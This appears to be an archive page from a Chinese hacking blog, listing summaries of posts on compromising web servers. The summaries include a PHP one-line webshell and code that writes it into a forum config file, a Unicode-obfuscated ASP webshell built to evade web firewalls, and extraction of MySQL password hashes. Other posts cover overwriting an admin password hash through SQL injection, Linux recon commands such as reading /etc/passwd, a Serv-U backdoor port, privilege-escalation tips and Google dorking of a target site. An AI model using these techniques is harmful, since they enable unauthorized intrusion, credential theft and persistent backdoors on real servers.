上一页 1 2 3 4 5 6 7 ··· 13 下一页
摘要: mysql hash 密码破解讲解:mysql的用户名密码保存在mysql库user表中,找到MySQL\data\mysql\目录下的 user.MYD user.MYI user.frm 三个文件,拷贝到自己的mysql数据库目录下,就可以查看用户的hash了。用sql语句提取hash则如下: use mysql; select user,password from user;得到hash: test:*085D85329E1557C869A120C9157315A07D51E8A7 ogame:*085D85329E1557C869A120C9157315A07D51E8A7 iii6_ 阅读全文
posted @ 2011-09-13 20:55 WHaa_(T_T) 阅读(555) 评论(0) 推荐(0) 编辑
摘要: 一句话木马<?eval($_POST[cmd]);?>到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);fclose( 阅读全文
posted @ 2011-09-13 20:52 WHaa_(T_T) 阅读(200) 评论(0) 推荐(0) 编辑
摘要: 现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。1.新建一个mdb2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;(实际是<% execute request(“a”)%>)3.改后缀为asp/asa4.上传5.一句话客户端或者菜刀连接 阅读全文
posted @ 2011-09-13 20:45 WHaa_(T_T) 阅读(415) 评论(0) 推荐(0) 编辑
摘要: cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表.ifconfig {eth0 etc} – 查看网卡信息.ps aux – 查看运行进程.gcc in_file -o out_file – 编译c文件.cat /etc/passwd – 查看系统账号.sudo – 普通用户运行root权限的命令,前提是 /etc/sudoers中有此账户的规则.id – 查看当前用户各种id.which wget curl w3m lynx – 查看当前可用的下载器uname -r -查看内核版本信息 (or) cat /etc/release 阅读全文
posted @ 2011-09-13 20:38 WHaa_(T_T) 阅读(231) 评论(0) 推荐(0) 编辑
摘要: 很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码的Md5值替换为我们自己的可破解的Md5即可。 注入点已经找到:http://xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。 密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 注射的语句如下: ;update shop_admin set pas 阅读全文
posted @ 2011-09-13 20:14 WHaa_(T_T) 阅读(289) 评论(0) 推荐(0) 编辑
摘要: 一:找可写目录这个很关键的,星外可写目录 其实吐司已经汇总了。不过星外最近又更新了,各位颤抖把。。。C:\7i24.com\iissafe\log\ ’旧的星外可写,可以执行,但是新的星外要不就是可写但是不能执行。。 建议大家把cmd 后缀 修改为 src,txt,com执行,有时候反而能成功其他的可写目录相信大家已经收集了,这里我就不多说了,其次 华众的主机 在注册表就可以秒杀的找可写其实 除了星外提权漏洞,大家一般的都可以找到,而且temp 都可以执行成功,二:杀器提权等各种提权,敏感文件然后什么反弹shell,还有一些敏感文件 ,找root sa 等 config 配置文件就不要我教了把 阅读全文
posted @ 2011-09-13 06:50 WHaa_(T_T) 阅读(208) 评论(0) 推荐(0) 编辑
摘要: 看了一个站。有上传漏洞 。但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是web 大马等上面的关键词。只要存在。 直接把整个文件过滤成空白。 也就是今我遇到是一样的。上传测试。发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。= =|||他竟然直接判断是否存在<%%> 这是所有asp都存在的= =!! 需要传能解析的asp.怎么能少了<%%>呢?如何突破呢? 我翻我的一句话的时候看到了一个东西。如下://不需要用到<%%>这不就是一般的scrip 阅读全文
posted @ 2011-09-13 06:42 WHaa_(T_T) 阅读(234) 评论(0) 推荐(0) 编辑
摘要: 需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些权限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录解决终端mstsc /console /v:你的服务器IP:远程端口IIS管理器 快捷:inetmgr.exe===================================================================== 阅读全文
posted @ 2011-09-04 18:54 WHaa_(T_T) 阅读(643) 评论(0) 推荐(0) 编辑
摘要: 利用google完全是可以对一个站点进行信息收集和渗透的,下面用google对特定站点进行一次测试。—————————————————————————————————————首先用google先看这个站点的一些基本情况(一些细节部分就略去了):site:xxxx.com从返回的信息中,找到几个该校的几个系院的域名:http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下,应该是在不同的服务器.先找找网站的管理后台地址:site:xxxx.com intext:管理site:xxxx.com inu 阅读全文
posted @ 2011-09-01 22:32 WHaa_(T_T) 阅读(515) 评论(0) 推荐(0) 编辑
摘要: 常见虚拟主机目录对照D:\virtualhost\web580651\www\ 新网虚拟主机F:\usr\fw04408\xpinfo\ 万网虚拟主机D:\hosting\wwwroot\Prim@Hosting虚拟主机e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机d:\freehost\zhoudeyang\web\ 星外虚拟主机主机D:\vhostroot\LocalUser\gdrt\ 星外分支f:\host\wz8088\web\ 星外分支D:\Vhost\WebRoot\51dancecn\ 未知D:\vhostroot\localuser\ vhostro 阅读全文
posted @ 2011-08-31 20:27 WHaa_(T_T) 阅读(504) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 ··· 13 下一页